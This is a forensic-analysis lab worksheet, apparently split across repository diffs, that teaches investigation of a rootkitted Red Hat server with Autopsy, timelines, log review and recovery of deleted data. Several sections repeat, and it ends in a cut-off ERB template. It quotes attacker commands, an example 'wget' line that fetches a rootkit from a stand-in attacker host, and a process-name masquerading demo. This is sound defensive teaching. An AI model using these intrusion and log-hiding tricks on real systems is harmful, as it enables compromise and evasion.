```bash
less evidence/md5s
```
> 'q' to quit
As you have learned in the Integrity Management lab, this information can be used to check whether files have changed.
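To make the mechanism concrete, here is a minimal sketch using throwaway files (not the lab evidence): `md5sum -c` re-hashes each file listed in a recorded hash list and flags anything that has changed.

```bash
# Sketch on throwaway files: record clean-state hashes, then detect tampering.
cd "$(mktemp -d)"
echo "clean system file" > passwd
md5sum passwd > md5s            # record the hash while the file is "clean"
md5sum -c md5s                  # prints: passwd: OK
echo "attacker change" >> passwd
md5sum -c md5s || true          # prints: passwd: FAILED
```

The lab evidence works the same way, just with thousands of entries in the hash list.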
## Starting Autopsy
Autopsy is a front-end for the Sleuth Kit (TSK) collection of forensic analysis command line tools. There is a version of Autopsy included in Kali Linux (a newer desktop-based version is also available for Windows).
==Create a directory== for storing the evidence files from Autopsy:
```bash
mkdir /root/evidence/autopsy
```
Start Autopsy. You can do this using the program menu. ==Click Applications / Forensics / autopsy.==
A terminal window should be displayed.
==Open Firefox, and visit [http://localhost:9999/autopsy](http://localhost:9999/autopsy)==
==Click "New Case".==
==Enter a case name==, such as "RedHatCompromised", and ==a description==, such as "Compromised Linux server", and ==enter your name==. ==Click "New Case".==
==Click the "Add Host" button.==
In section "6. Path of Ignore Hash Database", ==enter /root/evidence/md5s==
==Click the "Add Host" button== at the bottom of the page
==Click "Add Image".==
==Click "Add Image File".==
For section "1. Location", ==enter /root/evidence/hda1.img==
For "2. Type", ==select "Partition".==
For "3. Import Method", ==select "Symlink".==
==Click "Next".==
==Click "Add".==
==Click "Ok".==
## File type analysis and integrity checking
Now that you have started and configured Autopsy with a new case and hash database, you can view the categories of files, while ignoring files that you know to be safe.
==Click "Analyse".==
==Click "File Type".==
==Click "Sort Files by Type".==
Confirm that "Ignore files that are found in the Exclude Hash Database" is selected.
==Click "Ok"==, this analysis takes some time.
Once complete, ==view the "Results Summary".==
The output shows that over 16000 files have been ignored because they were found in the md5 hashes ("Hash Database Exclusions"). This is good news, since what it leaves us with are the interesting files that have changed or been created since the system was in a clean state. This includes archives, executables, and text files (amongst other categories).
==Click "View Sorted Files".==
Copy the results file location as reported by Autopsy, and ==open the report in a new tab within Firefox:==
> /var/lib/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html
==Click "compress"==, to view the compressed files. You are greeted with a list of two compressed file archives, "/etc/opt/psyBNC2.3.1.tar.gz", and "/root/sslstop.tar.gz".
==Figure out what `psyBNC2.3.1.tar.gz` is used for.==
> Try using Google, to search for the file name, or part thereof.
Browse the evidence in /mnt/compromised/etc/opt (on the Kali Linux system, using a file browser such as Dolphin) and look at the contents of the archive (in /etc/opt, you may find that the attacker has left an uncompressed version, which you can assess in Autopsy). Remember: don't execute any files from the compromised system on your analysis machine, since you risk infecting it with any malware present. For this reason, it is safer to assess these files via Autopsy. ==Browse to the directory by clicking back to the Results Summary tab of Autopsy, and clicking "File Analysis"==, then browse to the files from there (in /etc/opt). Read the psyBNC README file, and ==note what this software package is used for.==
> **Help: if the README file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click each direct block link in turn to see the content of the README file. The direct block links are displayed at the bottom left-hand side of the webpage.
Next, we investigate what sslstop.tar.gz is used for. A quick Google brings up a CGSecurity.org page, which reports that this script modifies httpd.conf to disable SSL support from Apache. Interesting... Why would an attacker want to disable SSL support? This should soon become clear.
==Return to the page where "compress" was accessed== (/root/evidence/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html), and ==click "exec"==. This page lists a fairly extensive collection of new executables on our compromised server.
==Make a list of all the executables that are likely trojanized.==
> Hint: for now ignore the "relocatable" objects left from compiling the PSYBNC software, and focus on "executable" files, especially those in /bin/ and /usr/bin/.
---
Refer to your previously collected evidence to ==identify whether any of the new executables were those with open ports== when live information was collected. Two of these have particularly interesting file names: `/usr/bin/smbd -D` and `/usr/bin/(swapd)`. These names are designed to be deceptive: for example, the ` -D` embedded in the filename is designed to trick system administrators into thinking the process was simply started with a "-D" command-line argument.
Note that /lib/.x/ contains a number of new executables, including one called "hide". These are likely part of a rootkit.
> **Hint:** to view these files you will have to look in /mnt/compromised/lib/.x. The .x folder is a hidden folder (all folders and files in Linux whose names begin with a "." are hidden). Therefore, you will have to use the -a switch when using the ls command in a terminal, or tell the graphical file manager to display hidden files (View &gt; Show Hidden Files, or Ctrl+H).
==Using Autopsy "File Analysis" mode, browse to "/lib/.x/"==. **Explicit language warning: if you are easily offended, then skip this next step.** View the contents of "install.log".
> **Hint:** you will have to click **../** to move up the directory tree until you can see the lib directory in the root directory /.
> **Help: if the install.log file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click the direct block link to see the content of the install.log file. The direct block links are displayed at the bottom left-hand side of the webpage.
This includes the lines:
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
> \# SucKIT version 1.3b by Unseen &lt; unseen@broken.org &gt; \#
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
SuckIT is a rootkit that tampers with the Linux kernel directly via /dev/kmem, rather than the usual approach of loading a loadable kernel module (LKM). The lines in the log may indicate that the rootkit had troubles loading.
SuckIT and the rootkit technique is described in detail in Phrack issue 58, article 0x07 "Linux on-the-fly kernel patching without LKM"
> [*http://www.textfiles.com/magazines/PHRACK/PHRACK58*](http://www.textfiles.com/magazines/PHRACK/PHRACK58)
==Using Autopsy "File Analysis", view the file /lib/.x/.boot==
> **Help:** again you may need to view the block directly that contains the .boot file. Make a note of the file's access times, this will come in handy soon.
This shell script starts an SSH server (s/xopen), and sends an email to a specific email address to inform them that the machine is available. View the script, and ==determine what email address it will email the information to.==
Return to the file type analysis (presumably still open in a Firefox tab), still viewing the "exec" category, and also note the presence of "adore.o". Adore is another rootkit (and worm); this one loads via an LKM (loadable kernel module).
Here is a concise description of a version of Adore:
> [*http://lwn.net/Articles/75990/*](http://lwn.net/Articles/75990/)
This system is well and truly compromised, with multiple kernel rootkits installed, and various trojanized binaries.
### Timeline analysis
It helps to reconstruct the timeline of events on the system, to get a better understanding. Software such as the Sleuth Kit (either using the Autopsy frontend or the mactime command line tool) analyses the MAC times of files (that is, the most recent modification, most recent access, and most recent inode change[^1]) to reconstruct a sequence of file access events.
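These three timestamps can be inspected on any Linux file with `stat`; a quick sketch on a throwaway file (the filename and content are arbitrary):

```bash
# Sketch: the access (a), modify (m), and change (c) times that
# timeline tools such as mactime reconstruct events from.
f=$(mktemp)
echo "data" > "$f"              # updates the modification (and change) time
cat "$f" > /dev/null            # updates the access time (subject to relatime)
stat --printf 'Access: %x\nModify: %y\nChange: %z\n' "$f"
```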
In another Firefox tab, ==visit [*http://localhost:9999/autopsy*](http://localhost:9999/autopsy), click "Open Case", "Ok", "Ok".==
==Click "File Activity Timelines".==
==Click "Create Data File".==
==Select "/1/ hda1.img-0-0 ext".==
==Click "Ok".==
==Click "Ok".==
For "5. Select the UNIX image that contains the /etc/passwd and /etc/group files", ==select "hda1.img-0-0".==
Wait while a timeline is generated.
==Click "Ok".==
Once analysis is complete, the timeline is presented. Note that the timeline starts with files accessed on Jan 01 1970.
==Click "Summary".==
A number of files are specified as accessed on Jan 01 1970. What is special about this date?
==Browse through the history.== Note that it is very detailed, and it is easy to get lost (and waste time) in irrelevant detail.
The access date you previously recorded (for "/lib/.x/.boot") was in August 2003, so this is probably a good place to start.
==Browse to August 2003 on the timeline==, and follow along:
Note that on the 6th of August it seems many files were accessed, and not altered (displayed as ".a.."[^2]). This is probably the point at which the md5 hashes of all the files on the system were collected.
On 9th August a number of system files were accessed, including "/sbin/runlevel", "/sbin/ipchains", and "/bin/login". This indicates that the system was likely rebooted at this time.
On 10th August, a number of files that have since been deleted were accessed.
Shortly thereafter the inode data was changed (displayed as "..c.") for many files. Then many files owned by the *apache* user were last modified before they were deleted. The apache user goes on to access some more files, and then a number of header files (.h) were accessed, presumably in order to compile a C program from source. Directly after, some files were created, including "/usr/lib/adore", the Adore rootkit.
At 23:30:54 /root/.bash\_history and /var/log/messages were symlinked to /dev/null.
Next more header files were accessed, this time Linux kernel headers, presumably to compile a kernel module (or perhaps some code that tries to tamper with the kernel). This was followed by the creation of the SuckIT rootkit files, which we previously investigated.
Note that a number of the files created are again owned by the "apache" user.
What does this tell you about the likely source of the compromise?
Further down, note the creation of the /root/sslstop.tar.gz file which was extracted (files created), then compiled and run. Shortly after, the Apache config file (/etc/httpd/conf/httpd.conf) was modified.
Why would an attacker, after compromising a system, want to stop SSL support in Apache?
Meanwhile, the attacker has accidentally created a /.bash\_history, which has not been deleted.
Further down we see wget accessed and used to download the /etc/opt/psyBNC2.3.1.tar.gz file, which we investigated earlier.
This file was then extracted, and the program compiled. This involved accessing many header (.h) files. Finally, the "/etc/opt/psybnc/psybnc.conf" file is modified, presumably by the attacker, in order to configure the behaviour of the program.
---
## Logs analysis
As you learned in the Log Management topic, the most common logging system on Unix systems is Syslog, which is typically configured in /etc/syslog.conf (or similar, such as rsyslog). Within the Autopsy File Analysis browser, ==navigate to this configuration file and view its contents.== Note that most logging is configured to go to /var/log/messages. Some security messages are logged to /var/log/secure. Boot messages are logged to /var/log/boot.log.
==Make a note of where mail messages are logged==, you will use this later:
Within Autopsy, browse to /var/log. Note that you cannot view the messages file, which would have contained many helpful log entries. Click the inode number to the right (47173):
As previously seen in the timeline, this file has been symlinked to /dev/null. If you are not familiar with /dev/null, search the Internet for an explanation.
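In short, /dev/null discards everything written to it; a small sketch (in a throwaway directory, with a made-up command) shows why the symlink destroys the history:

```bash
# Sketch: a history file symlinked to /dev/null silently discards writes.
cd "$(mktemp -d)"
ln -s /dev/null .bash_history
echo "wget http://attacker.example/rootkit.tar.gz" >> .bash_history
wc -c < .bash_history           # prints 0: nothing was retained
```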
For now, we will continue by investigating the files that are available, and later investigate deleted files.
Using Autopsy, ==view the /var/log/secure file==, and identify any IP addresses that have attempted to log in to the system using SSH or Telnet.
==Determine the country of origin for each of these connection attempts:==
> On a typical Unix system we can look up this information using the command:
```bash
whois *IP-address*
```
> (Where IP-address is the IP address being investigated).
>
> However, this may not be possible from within our lab environment; alternatively, there are a number of websites that can be used (potentially from your own host PC):
>
> [*http://whois.domaintools.com/*](http://whois.domaintools.com/)
>
> [*http://whois.net/ip-address-lookup/*](http://whois.net/ip-address-lookup/)
>
> You may also run a traceroute to determine what routers lie between your system and the remote system.
>
> Additionally, software and websites exist that will graphically approximate the location of the IP:
>
> [*http://www.iplocationfinder.com/*](http://www.iplocationfinder.com/)
---
Within Autopsy, ==view the /var/log/boot.log file==. At the top of this file Syslog reports starting at August 10 at 13:33:57.
==LogBook Question: Given what we have learned about this system during timeline analysis, what is suspicious about Syslog restarting on August 10th? Was the system actually restarted at that time?==
Note that according to the log, Apache fails to restart. Why can't Apache restart? Do you think the attacker intended to do this?
==Open the mail log file==, which you recorded the location of earlier. ==Identify the email addresses that messages were sent to.==
---
Another valuable source of information are records of commands that have been run by users. One source of this information is the .bash\_history file. As noted during timeline analysis, the /root/.bash\_history file was symlinked to /dev/null, meaning the history was not saved. However, the attacker did leave behind a Bash history file in the root of the filesystem ("/"). ==View this file.==
Towards the end of this short Bash session the attacker downloads sslstop.tar.gz, then the attacker runs:
```bash
ps aux | grep apache
kill -9 21510 21511 23289 23292 23302
```
==LogBook Question: What is the attacker attempting to do with these commands?==
Apache has clearly played an important role in the activity of the attacker, so it is natural to investigate Apache's configuration and logs.
Still in Autopsy, ==browse to /etc/httpd/conf/, and view httpd.conf.==
Note that the Apache config has been altered by sslstop, by changing the "HAVE\_SSL" directive to "HAVE\_SSS" (remember, this file was shown in the timeline to be modified after sslstop was run).
This configuration also specifies that Apache logs are stored in /etc/httpd/logs, and upon investigation this location is symlinked to /var/log/httpd/. This is a common Apache configuration.
Unfortunately the /var/log/httpd/ directory does not exist, so clearly the attacker has attempted to cover their tracks by deleting Apache's log files.
## Deleted files analysis
Autopsy can be used to view files that have been deleted. Simply click "All Deleted Files", and browse through the deleted files it has discovered. Some of the deleted files will have known filenames, others will not.
However, this is not an efficient way of searching through content to find relevant information.
Since we are primarily interested in recovering lost log files (which are ASCII human-readable), one of the quickest methods is to extract all unallocated data from our evidence image, and search that for likely log messages. Autopsy has a keyword search. However, manual searching can be more efficient.
In a terminal console in Kali Linux, ==run:==
```bash
blkls -A evidence/hda1.img | strings > evidence/unallocated
```
This extracts all unallocated blocks from the partition and pipes them through strings, which keeps only printable text (removing any binary data); the results are stored in "evidence/unallocated".
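If you have not used strings before, this small sketch (on a fabricated file, not the real image) shows how it discards binary data and keeps printable runs:

```bash
# Sketch: strings keeps printable sequences (4+ characters by default).
cd "$(mktemp -d)"
{ printf 'Aug 10 13:33:57 syslogd restart'; head -c 4 /dev/zero; printf 'more log text\n'; } > sample.bin
strings sample.bin
# prints:
# Aug 10 13:33:57 syslogd restart
# more log text
```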
Open the extracted information for viewing:
```bash
less evidence/unallocated
```
Scroll down, and ==find any deleted email message logs.==
> Hint: try pressing ":" then type "/To:".
==LogBook Question: What sorts of information was emailed?==
To get the list of all email recipients quit less (press 'q'), and ==run:==
```bash
grep "To:.*@" evidence/unallocated
```
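As a sketch of what that pattern matches (fabricated data; the addresses below are made up), and one way to trim the matches down to bare addresses:

```bash
# Sketch: find "To:" header lines in recovered text, then strip the prefix.
cd "$(mktemp -d)"
printf 'To: attacker@example.org\nbinary junk\nTo: dropbox@example.net\n' > unallocated
grep "To:.*@" unallocated                    # the raw matching lines
grep "To:.*@" unallocated | sed 's/^To: //'  # just the addresses
```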
Once again, ==open the extracted deleted information== for viewing:
```bash
less evidence/unallocated
```
Scroll down until you notice some Bash history. What files have been downloaded using wget? Quit less, and write a grep command to search for wget commands used to download files.
---
==Write a grep command to search for commands used by the attacker to delete files from the system.==
Once again, open the extracted deleted information for viewing:
```bash
less evidence/unallocated
```
Press ":" and type "/shellcode". There are quite a few exploits on this system, not all of which were used in the compromise.
==Search for the contents of log files== that were recorded on the day the attack took place:
```bash
grep "Aug[/ ]10" evidence/unallocated
```
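The bracket expression `[/ ]` matches a single slash or space, so the pattern catches dates written either way; a quick sketch on fabricated lines:

```bash
# Sketch: [/ ] matches "Aug 10" and "Aug/10" but not "Aug 11".
cd "$(mktemp -d)"
printf 'Aug 10 13:33:57 syslog restart\nAug/10/2003 httpd error\nAug 11 unrelated\n' > sample
grep "Aug[/ ]10" sample
```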
Note that there is an error message from Apache that repeats many times, complaining that it cannot hold a lockfile. This is caused by the attacker having deleted the logs directory, which Apache is using.
If things have gone extremely well the output will include further logs from Apache, including error messages with enough information to search the Internet for information about the exploit that was used to take control of Apache to run arbitrary code. If not, then at some point during live analysis you may have clobbered some deleted files. This is the important piece of information from unallocated disk space:
```
[Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
```
This may indicate the exploitation of this software vulnerability:
> OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability
>
> [*http://www.securityfocus.com/bid/5363*](http://www.securityfocus.com/bid/5363)
[^1]: Note that the specifics of the times that are recorded depend on the filesystem in use. A typical Unix filesystem keeps a record of the most recent modification, most recent access, and most recent inode change. On Windows filesystems a creation date may be recorded in place of the inode change date.
[^2]: [*http://wiki.sleuthkit.org/index.php?title=Mactime\_output*](http://wiki.sleuthkit.org/index.php?title=Mactime_output)

View File

@@ -0,0 +1,79 @@
## Deleted files analysis
Autopsy can be used to view files that have been deleted. Simply click "All Deleted Files", and browse through the deleted files it has discovered. Some of the deleted files will have known filenames, others will not.
However, this is not an efficient way of searching through content to find relevant information.
Since we are primarily interested in recovering lost log files (which are ASCII human-readable), one of the quickest methods is to extract all unallocated data from our evidence image, and search that for likely log messages. Autopsy has a keyword search. However, manual searching can be more efficient.
In a terminal console in Kali Linux, ==run:==
```bash
blkls -A evidence/hda1.img | strings > evidence/unallocated
```
This extracts all unallocated blocks from the partition and pipes them through strings, which keeps only printable text (removing any binary data); the results are stored in "evidence/unallocated".
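If you have not used strings before, this small sketch (on a fabricated file, not the real image) shows how it discards binary data and keeps printable runs:

```bash
# Sketch: strings keeps printable sequences (4+ characters by default).
cd "$(mktemp -d)"
{ printf 'Aug 10 13:33:57 syslogd restart'; head -c 4 /dev/zero; printf 'more log text\n'; } > sample.bin
strings sample.bin
# prints:
# Aug 10 13:33:57 syslogd restart
# more log text
```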
Open the extracted information for viewing:
```bash
less evidence/unallocated
```
Scroll down, and ==find any deleted email message logs.==
> Hint: try pressing ":" then type "/To:".
==LogBook Question: What sorts of information was emailed?==
To get the list of all email recipients quit less (press 'q'), and ==run:==
```bash
grep "To:.*@" evidence/unallocated
```
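As a sketch of what that pattern matches (fabricated data; the addresses below are made up), and one way to trim the matches down to bare addresses:

```bash
# Sketch: find "To:" header lines in recovered text, then strip the prefix.
cd "$(mktemp -d)"
printf 'To: attacker@example.org\nbinary junk\nTo: dropbox@example.net\n' > unallocated
grep "To:.*@" unallocated                    # the raw matching lines
grep "To:.*@" unallocated | sed 's/^To: //'  # just the addresses
```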
Once again, ==open the extracted deleted information== for viewing:
```bash
less evidence/unallocated
```
Scroll down until you notice some Bash history. What files have been downloaded using wget? Quit less, and write a grep command to search for wget commands used to download files.
---
==Write a grep command to search for commands used by the attacker to delete files from the system.==
Once again, open the extracted deleted information for viewing:
```bash
less evidence/unallocated
```
Press ":" and type "/shellcode". There are quite a few exploits on this system, not all of which were used in the compromise.
==Search for the contents of log files== that were recorded on the day the attack took place:
```bash
grep "Aug[/ ]10" evidence/unallocated
```
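The bracket expression `[/ ]` matches a single slash or space, so the pattern catches dates written either way; a quick sketch on fabricated lines:

```bash
# Sketch: [/ ] matches "Aug 10" and "Aug/10" but not "Aug 11".
cd "$(mktemp -d)"
printf 'Aug 10 13:33:57 syslog restart\nAug/10/2003 httpd error\nAug 11 unrelated\n' > sample
grep "Aug[/ ]10" sample
```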
Note that there is an error message from Apache that repeats many times, complaining that it cannot hold a lockfile. This is caused by the attacker having deleted the logs directory, which Apache is using.
If things have gone extremely well the output will include further logs from Apache, including error messages with enough information to search the Internet for information about the exploit that was used to take control of Apache to run arbitrary code. If not, then at some point during live analysis you may have clobbered some deleted files. This is the important piece of information from unallocated disk space:
```
[Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows)
[Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different
```
This may indicate the exploitation of this software vulnerability:
> OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability
>
> [*http://www.securityfocus.com/bid/5363*](http://www.securityfocus.com/bid/5363)
[^1]: Note that the specifics of the times that are recorded depend on the filesystem in use. A typical Unix filesystem keeps a record of the most recent modification, most recent access, and most recent inode change. On Windows filesystems a creation date may be recorded in place of the inode change date.
[^2]: [*http://wiki.sleuthkit.org/index.php?title=Mactime\_output*](http://wiki.sleuthkit.org/index.php?title=Mactime_output)

View File

@@ -0,0 +1,195 @@
# Analysis of a Compromised System - Part 2: Offline Analysis
## Getting started
> ###==**Note: You cannot complete this lab (part 2) without having saved the evidence you collected during part 1 of the lab.**==
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot-server (leave it running, you don't log into this)
- desktop (this week's)
- desktop (last week's desktop VM, to access your evidence)
- kali (user: root, password: toor)
All of these VMs need to be running to complete the lab.
## Introduction to dead (offline) analysis
Once you have collected information from a compromised computer (as you have done in the previous lab), you can continue analysis offline. There are a number of software environments that can be used to do offline analysis. We will be using Kali Linux, which includes a number of forensic tools. Another popular toolset is the Helix incident response environment, which you may also want to experiment with.
This lab reinforces what you have learned about integrity management and log analysis, and introduces a number of new concepts and tools.
## Getting our data into the analysis environment
To start, we need to ==get the evidence that has been collected in the previous lab onto an analysis system== (copy to /root/evidence on the Kali VM) that has software for analysing the evidence.
If you still have your evidence stored on last week's desktop VM, you can transfer the evidence straight out of /home/*user* to the Kali Linux system using scp:
```bash
scp -r *username-from-that-system*@*ip-address*:evidence evidence
```
> **Note the IP addresses**: run /sbin/ifconfig on last week's Desktop VM, and also run ifconfig on the Kali VM. Make a note of the two IP addresses, which should be on the same subnet (starting the same).
## Mounting the image read-only
**On Kali Linux**:
It is possible to mount the partition image directly as a [*loop device*](http://en.wikipedia.org/wiki/Loop_device), and access the files directly. However, doing so should be done with caution (and is generally a bad idea, unless you are very careful), since there is some chance that it may result in changes to your evidence, and you risk infecting the analysis machine with any malware on the system being analysed. However, this technique is worth exploring, since it does make accessing files particularly convenient.
==Create a directory to mount our evidence onto:==
```bash
mkdir /mnt/compromised
```
==Mount the image== that we previously captured of the state of the main partition on the compromised system:
```bash
mount -o ro,loop evidence/hda1.img /mnt/compromised
```
> Troubleshooting: If you used a VMware VM in the live analysis lab, you may need to replace hda1.img with sda1.img
Confirm that you can now see the files that were on the compromised system:
```bash
ls /mnt/compromised
```
## Preparing for analysis of the integrity of files
Fortunately the "system administrator" of the Red Hat server had run a file integrity tool to generate hashes before the system was compromised. Start by saving a copy of the hashes that were recorded while the system was in a clean state...
<a href="data:<%= File.read self.templates_path + 'md5sum-url-encoded' %>">Click here to download the md5 hashes of the system before it was compromised</a>
==Save the hashes in the evidence directory of the Kali VM, naming the file "md5s".==
==View the file==, to confirm all went well:
```bash
less evidence/md5s
```
> 'q' to quit
As you have learned in the Integrity Management lab, this information can be used to check whether files have changed.
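To make the mechanism concrete, here is a minimal sketch using throwaway files (not the lab evidence): `md5sum -c` re-hashes each file listed in a recorded hash list and flags anything that has changed.

```bash
# Sketch on throwaway files: record clean-state hashes, then detect tampering.
cd "$(mktemp -d)"
echo "clean system file" > passwd
md5sum passwd > md5s            # record the hash while the file is "clean"
md5sum -c md5s                  # prints: passwd: OK
echo "attacker change" >> passwd
md5sum -c md5s || true          # prints: passwd: FAILED
```

The lab evidence works the same way, just with thousands of entries in the hash list.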
## Starting Autopsy
Autopsy is a front-end for the Sleuth Kit (TSK) collection of forensic analysis command line tools. There is a version of Autopsy included in Kali Linux (a newer desktop-based version is also available for Windows).
==Create a directory== for storing the evidence files from Autopsy:
```bash
mkdir /root/evidence/autopsy
```
Start Autopsy. You can do this using the program menu. ==Click Applications / Forensics / autopsy.==
A terminal window should be displayed.
==Open Firefox, and visit [http://localhost:9999/autopsy](http://localhost:9999/autopsy)==
==Click "New Case".==
==Enter a case name==, such as "RedHatCompromised", and ==a description==, such as "Compromised Linux server", and ==enter your name==. ==Click "New Case".==
==Click the "Add Host" button.==
In section "6. Path of Ignore Hash Database", ==enter /root/evidence/md5s==
==Click the "Add Host" button== at the bottom of the page
==Click "Add Image".==
==Click "Add Image File".==
For section "1. Location", ==enter /root/evidence/hda1.img==
For "2. Type", ==select "Partition".==
For "3. Import Method", ==select "Symlink".==
==Click "Next".==
==Click "Add".==
==Click "Ok".==
## File type analysis and integrity checking
Now that you have started and configured Autopsy with a new case and hash database, you can view the categories of files, while ignoring files that you know to be safe.
==Click "Analyse".==
==Click "File Type".==
==Click "Sort Files by Type".==
Confirm that "Ignore files that are found in the Exclude Hash Database" is selected.
==Click "Ok"==, this analysis takes some time.
Once complete, ==view the "Results Summary".==
The output shows that over 16000 files have been ignored because they were found in the md5 hashes ("Hash Database Exclusions"). This is good news, since what it leaves us with are the interesting files that have changed or been created since the system was in a clean state. This includes archives, executables, and text files (amongst other categories).
==Click "View Sorted Files".==
Copy the results file location as reported by Autopsy, and ==open the report in a new tab within Firefox:==
> /var/lib/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html
==Click "compress"==, to view the compressed files. You are greeted with a list of two compressed file archives, "/etc/opt/psyBNC2.3.1.tar.gz", and "/root/sslstop.tar.gz".
==Figure out what `psyBNC2.3.1.tar.gz` is used for.==
> Try using Google, to search for the file name, or part thereof.
Browse the evidence in /mnt/compromised/etc/opt (on the Kali Linux system, using a file browser such as Dolphin) and look at the contents of the archive (in /etc/opt, you may find that the attacker has left an uncompressed version, which you can assess in Autopsy). Remember: don't execute any files from the compromised system on your analysis machine, since you risk infecting it with any malware present. For this reason, it is safer to assess these files via Autopsy. ==Browse to the directory by clicking back to the Results Summary tab of Autopsy, and clicking "File Analysis"==, then browse to the files from there (in /etc/opt). Read the psyBNC README file, and ==note what this software package is used for.==
> **Help: if the README file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click each direct block link in turn to see the content of the README file. The direct block links are displayed at the bottom left-hand side of the webpage.
Next, we investigate what sslstop.tar.gz is used for. A quick Google brings up a CGSecurity.org page, which reports that this script modifies httpd.conf to disable SSL support from Apache. Interesting... Why would an attacker want to disable SSL support? This should soon become clear.
==Return to the page where "compress" was accessed== (/root/evidence/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html), and ==click "exec"==. This page lists a fairly extensive collection of new executables on our compromised server.
==Make a list of all the executables that are likely trojanized.==
> Hint: for now ignore the "relocatable" objects left from compiling the PSYBNC software, and focus on "executable" files, especially those in /bin/ and /usr/bin/.
---
Refer to your previously collected evidence to ==identify whether any of the new executables were those with open ports== when live information was collected. Two of these have particularly interesting file names: `/usr/bin/smbd -D` and `/usr/bin/(swapd)`. These names are designed to be deceptive: for example, the inclusion of ` -D` is designed to trick system administrators into thinking the process was started with the "-D" command-line argument flag.
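How easy is this deception? On Linux, tools such as ps and top report a process's argv[0], which the process itself chooses. A harmless, hypothetical bash demonstration (requires bash and a /proc filesystem):

```shell
# Start an innocuous sleep, but give it a deceptive argv[0] via bash's exec -a:
(exec -a '/usr/bin/smbd -D' sleep 10) &
pid=$!; sleep 1
# /proc/<pid>/cmdline is what ps and top display; NUL bytes separate the args:
tr '\0' ' ' < "/proc/$pid/cmdline"; echo
kill "$pid" 2>/dev/null
```

The printed command line begins with "/usr/bin/smbd -D", even though the real program is sleep, which is why file-level evidence matters more than process listings.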
Note that /lib/.x/ contains a number of new executables, including one called "hide". These are likely part of a rootkit.
> **Hint:** to view these files you will have to look in /mnt/compromised/lib/.x. The .x folder is a hidden folder (all folders and files in Linux that begin with a "." are hidden). Therefore, you will have to use the -a switch when using the ls command in a terminal or tell the graphical file manager to display hidden files ( View &gt; Show Hidden Files or Ctrl+H).
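The difference is easy to see in a terminal (hypothetical paths):

```shell
# Create a directory containing a visible file and a hidden dot-directory:
mkdir -p /tmp/hiddemo/.x && touch /tmp/hiddemo/visible
ls /tmp/hiddemo      # shows only: visible
ls -a /tmp/hiddemo   # additionally shows . .. and the hidden .x directory
```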
==Using Autopsy "File Analysis" mode, browse to "/lib/.x/"==. **Explicit language warning: if you are easily offended, then skip this next step.** View the contents of "install.log".
> **Hint:** you will have to click **../** to move up the directory tree until you can see the lib directory in the root directory /.
> **Help: if the install.log file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the install.log file. You will need to click the direct block link to see the content of the install.log file. The direct block links are displayed at the bottom left-hand side of the webpage.
This includes the lines:
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
> \# SucKIT version 1.3b by Unseen &lt; unseen@broken.org &gt; \#
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
SuckIT is a rootkit that tampers with the Linux kernel directly via /dev/kmem, rather than the usual approach of loading a loadable kernel module (LKM). The lines in the log may indicate that the rootkit had troubles loading.
SuckIT and the rootkit technique are described in detail in Phrack issue 58, article 0x07, "Linux on-the-fly kernel patching without LKM":
> [*http://www.textfiles.com/magazines/PHRACK/PHRACK58*](http://www.textfiles.com/magazines/PHRACK/PHRACK58)
==Using Autopsy "File Analysis", view the file /lib/.x/.boot==
> **Help:** again you may need to view the block directly that contains the .boot file. Make a note of the file's access times, this will come in handy soon.
This shell script starts an SSH server (s/xopen), and sends an email to a specific email address to inform them that the machine is available. View the script, and ==determine what email address it will email the information to.==
Return to the file type analysis (presumably still open in another browser tab) and, still viewing the "exec" category, note the presence of "adore.o". Adore is another rootkit (and worm); this one loads via an LKM (loadable kernel module).
Here is a concise description of a version of Adore:
> [*http://lwn.net/Articles/75990/*](http://lwn.net/Articles/75990/)
This system is well and truly compromised, with multiple kernel rootkits installed, and various trojanized binaries.


@@ -0,0 +1,242 @@
<%
require 'json'
require 'securerandom'
require 'digest/sha1'
require 'fileutils'
require 'erb'
if self.accounts.length < 2
abort('Sorry, you need to provide at least two accounts')
end
$first_account = JSON.parse(self.accounts.first)
$second_account = JSON.parse(self.accounts[1])
$files = []
$log_files = []
if $second_account.key?("leaked_filenames") && $second_account['leaked_filenames'].size > 0
$files = $second_account['leaked_filenames']
$log_files = $second_account['leaked_filenames'].grep(/log/)
end
if $files.empty?
$files = ['myfile', 'afile', 'filee', 'thefile']
end
if $log_files.empty?
$log_files = ['log', 'thelog', 'logs', 'frogonalog']
end
$main_user = $first_account['username'].to_s
$main_user_pass = $first_account['password'].to_s
$second_user = $second_account['username'].to_s
$example_file = "/home/#{$second_user}/#{$files.sample}"
$example_dir = "/home/#{$second_user}/personal_secrets/"
$web_server_ip = self.web_server_ip.first
$ids_server_ip = self.ids_server_ip.first
$hackerbot_server_ip = self.hackerbot_server_ip.first
$root_password = self.root_password
